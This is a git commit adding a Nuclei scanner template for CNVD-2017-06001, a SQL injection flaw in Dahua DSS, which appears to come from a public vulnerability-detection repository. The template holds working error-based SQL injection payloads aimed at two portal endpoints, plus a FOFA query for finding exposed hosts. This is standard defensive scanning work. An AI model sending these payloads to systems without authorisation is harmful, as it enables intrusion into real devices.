Merge pull request #9790 from projectdiscovery/CNVD-2017-06001

Create CNVD-2017-06001.yaml
2024-05-14 10:23:52 +05:30 · 2024-05-14 10:23:52 +05:30 · a92f09f7da
parent 998d0371c8 5c52990210
commit a92f09f7da
1 changed files with 36 additions and 0 deletions
--- a/http/cnvd/2017/CNVD-2017-06001.yaml
+++ b/http/cnvd/2017/CNVD-2017-06001.yaml
@ -0,0 +1,36 @@
+id: CNVD-2017-06001
+
+info:
+  name: Dahua DSS - SQL Injection
+  severity: high
+  author: napgh0st,ritikchaddha
+  reference:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="dahua-DSS"
+  tags: cnvd,cnvd2017,sqli,dahua
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
+      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "XPATH syntax error:"
+          - "c8c605999f3d8352d7bb792cf3fdb25"
+        condition: and
+
+      - type: status
+        status:
+          - 200